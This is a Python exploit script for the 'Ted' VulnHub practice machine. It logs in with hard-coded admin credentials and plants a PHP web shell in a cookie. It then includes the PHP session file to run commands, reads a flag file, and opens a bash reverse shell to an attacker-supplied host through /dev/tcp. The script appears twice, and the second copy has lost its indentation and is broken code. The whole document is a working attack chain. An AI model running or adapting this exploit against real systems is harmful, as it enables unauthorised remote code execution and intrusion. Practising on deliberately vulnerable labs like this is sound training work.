root-tanishq/Ted_vulnhub_revshell.py

## Ted_vulnhub_revshell.py
#!/usr/bin/env python3
import requests
import time
import os
import sys
import argparse

# User Arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', type=str,help=f'URL of the vulnerable application',required=True)
parser.add_argument('-lh','--lhost', type=str,help=f'LHOST IP on which the reverse shell will be sent',required=True)
parser.add_argument('-lp','--lport', type=int,help=f'LPORT on which the reverse shell will be sent',required=True)
args = parser.parse_args()

# Setting argumented variable
BASE_URL = args.url
LHOST = args.lhost
LPORT = int(args.lport)

# Basic session for working exploitation
s = requests.Session()

def search(cookie , phpsess):
    dataReq = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c':'cat /tmp/flag.txt' }
    print('[+] Payload sent')
    requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq) # Dummy request to change the value of the cookie
    time.sleep(1) # sleep for waiting for the update change
    proxy = {'http':'http://127.1:8080','https':'http://127.1:8080'}
    searchReq = requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq , proxies=proxy)
    print('[+] Retrieving flag')
    flag = searchReq.text.split(':"')[2].split('";')[0]
    print('[*] FLAG => ' + flag)
    print('[+] Starting process of getting a reverse shell')
    dataRev = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c': f'bash -c "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"' }
    print(f'[-] (LISTENER)=> Run # nc -lnvp {LPORT}')
    input('[*] Press Enter to get reverse shell')
    print('[++++++++] Reverse shell sent check Listener')
    s.post(BASE_URL + '/home.php' , cookies=cookie , data=dataRev)


def login():
    print('[+] Trying to Login %s' % (BASE_URL))
    loginparams = {'username':'admin','password':'8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918'}
    loginReq = s.post(BASE_URL + '/authenticate.php' , data=loginparams , allow_redirects=False)
    if loginReq.text == '':
        print('[+] Login Successfully')
        phpsessid = str(s.cookies.get_dict()).split("'")[3]
        print('[+] PHP session cookie: ' + phpsessid)
        cookies = {'PHPSESSID':phpsessid , 'user_pref':"<?php+system($_REQUEST['c'])%3b+%3f>"}
        search(cookies , phpsessid)


def main():
    # Calls our system here
    global BASE_URL
    global LHOST
    global LPORT
    login()


if __name__ == '__main__':
    main()
	#!/usr/bin/env python3
	import requests
	import time
	import os
	import sys
	import argparse

	# User Arguments
	parser = argparse.ArgumentParser()
	parser.add_argument('-u','--url', type=str,help=f'URL of the vulnerable application',required=True)
	parser.add_argument('-lh','--lhost', type=str,help=f'LHOST IP on which the reverse shell will be sent',required=True)
	parser.add_argument('-lp','--lport', type=int,help=f'LPORT on which the reverse shell will be sent',required=True)
	args = parser.parse_args()

	# Setting argumented variable
	BASE_URL = args.url
	LHOST = args.lhost
	LPORT = int(args.lport)

	# Basic session for working exploitation
	s = requests.Session()

	def search(cookie , phpsess):
	dataReq = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c':'cat /tmp/flag.txt' }
	print('[+] Payload sent')
	requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq) # Dummy request to change the value of the cookie
	time.sleep(1) # sleep for waiting for the update change
	proxy = {'http':'http://127.1:8080','https':'http://127.1:8080'}
	searchReq = requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq , proxies=proxy)
	print('[+] Retrieving flag')
	flag = searchReq.text.split(':"')[2].split('";')[0]
	print('[*] FLAG => ' + flag)
	print('[+] Starting process of getting a reverse shell')
	dataRev = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c': f'bash -c "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"' }
	print(f'[-] (LISTENER)=> Run # nc -lnvp {LPORT}')
	input('[*] Press Enter to get reverse shell')
	print('[++++++++] Reverse shell sent check Listener')
	s.post(BASE_URL + '/home.php' , cookies=cookie , data=dataRev)


	def login():
	print('[+] Trying to Login %s' % (BASE_URL))
	loginparams = {'username':'admin','password':'8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918'}
	loginReq = s.post(BASE_URL + '/authenticate.php' , data=loginparams , allow_redirects=False)
	if loginReq.text == '':
	print('[+] Login Successfully')
	phpsessid = str(s.cookies.get_dict()).split("'")[3]
	print('[+] PHP session cookie: ' + phpsessid)
	cookies = {'PHPSESSID':phpsessid , 'user_pref':"<?php+system($_REQUEST['c'])%3b+%3f>"}
	search(cookies , phpsessid)



	def main():
	# Calls our system here
	global BASE_URL
	global LHOST
	global LPORT
	login()


	if __name__ == '__main__':
	main()